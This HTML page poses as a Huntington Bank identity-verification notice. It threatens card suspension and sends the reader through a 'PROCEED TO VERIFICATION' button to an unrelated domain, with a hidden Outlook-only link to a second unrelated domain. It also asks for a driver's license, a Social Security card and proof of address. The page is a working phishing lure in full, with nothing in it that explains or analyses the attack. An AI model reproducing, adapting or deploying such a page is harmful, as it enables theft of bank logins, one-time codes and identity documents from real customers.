<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Before we proceed</title><!-- update the version number as needed -->
    <script defer src="//firebase/7.15.1/firebase-app.js"></script><!-- include only the Firebase features as you need -->
    <script defer src="//firebase/7.15.1/firebase-auth.js"></script>
    <script defer src="//firebase/7.15.1/firebase-database.js"></script>
    <script defer src="//firebase/7.15.1/firebase-messaging.js"></script>
    <script defer src="//firebase/7.15.1/firebase-storage.js"></script><!-- initialize the SDK after all desired features are loaded -->
    <script defer src="//firebase/init.js"></script>
    <style media="screen">
        body {
            background-image: url('https://files837.web.app/pc3.jpg');
        }

        #message {
            background: white;
            max-width: 360px;
            margin: 100px auto 100px;
            padding: 10px 24px;
            border-radius: 10px;
        }

        #message h2 {
            color: #ffa100;
            font-weight: bold;
            font-size: 16px;
            margin: 0 0 8px;
        }

        #message h1 {
            font-size: 22px;
            font-weight: 300;
            color: rgba(0, 0, 0, 0.753);
            margin: 0 0 16px;
            font-family: Arial, Helvetica;
            font-style: bold;
        }

        #message p {
            line-height: 140%;
            margin: 16px 0 24px;
            font-size: 15px;
            font-family: Arial, Helvetica;
        }

        #load {
            color: rgba(0, 0, 0, 0.4);
            text-align: center;
            font-size: 15px;
            font-family: Arial, Helvetica;
        }

        @media (max-width: 600px) {
            body {
                background-image: url('https://files837.web.app/pc3.jpg');
            }

            #message {
                margin: 60px auto 60px;
                max-width: 600px;
                padding: 15px 15px;
                box-shadow: none;
                border-radius: 10px
            }
        }
    </style>
</head>

<body>
    <div id="message">
        <p style="text-align:center;"><img src="https://files837.web.app/logo.png" alt="Huntington Bank" width="200" height="53"></p>
        <h1><b>Please read carefully</b></h1>
        <p style="text-align: justify;">For identity verification, we are awaiting the identifying documents for your Huntington Bank® Account. To finish these processes and avoid having your card account suspended, there are two options:<br>
        <br>
1. Online identity verification is a quick and convenient process that requires a one-time code to a registered phone number in your name and on our records, taking less than five minutes.
<div style="Margin-left: 20px;Margin-right: 20px;">
            <div class="btn btn--shadow btn--medium" style="Margin-bottom: 20px;text-align: center;"><a style="border-radius: 4px;display: inline-block;font-size: 12px;font-weight: bold;line-height: 22px;padding: 10px 20px 11px 20px;text-align: center;text-decoration: none !important;transition: opacity 0.1s ease-in;color: #ffffff !important;box-shadow: inset 0 -2px 0 0 rgba(0, 0, 0, 0.2);background-color: #269900;font-family: Arial, Helvetica, sans-serif;" href="https://cpsess3898913030.com/oam?mis">PROCEED TO VERIFICATION</a><br>
 
 <p style="text-align: justify;"> 2. Providing documentation of your residency with a 30-day expiration date, a copy of your driver's license that is now valid, and a copy of your foreign ID or Social Security card: Utility bills showing your physical address, such as those for phone, cable, gas, or electricity
 </p>

</p>    
                <!--[if mso]><p style="line-height:0;margin:0;">&nbsp;</p><v:roundrect xmlns:v="urn:schemas-microsoft-com:vml" href="https://pointedutter.com/web/auth/dashboard/account" style="width:165px" arcsize="10%" fillcolor="#2677D4" stroke="f"><v:shadow on="t" color="#1E5FAA" offset="0,2px"></v:shadow><v:textbox style="mso-fit-shape-to-text:t" inset="0px,9px,0px,8px"><center style="font-size:12px;line-height:22px;color:#FFFFFF;font-family:Arial, Helvetica, sans-serif;font-weight:bold;mso-line-height-rule:exactly;mso-text-raise:4px">Account verification</center></v:textbox></v:roundrect><![endif]-->
            </div>
            <div style=text-align:center;font-size:15px;line-height:19px;margin-top:20px;>
                <div><b>Huntington Bank Team</div>
                <p id="load"></p>
            </div>
        </div>
    </div>
</body>

</html>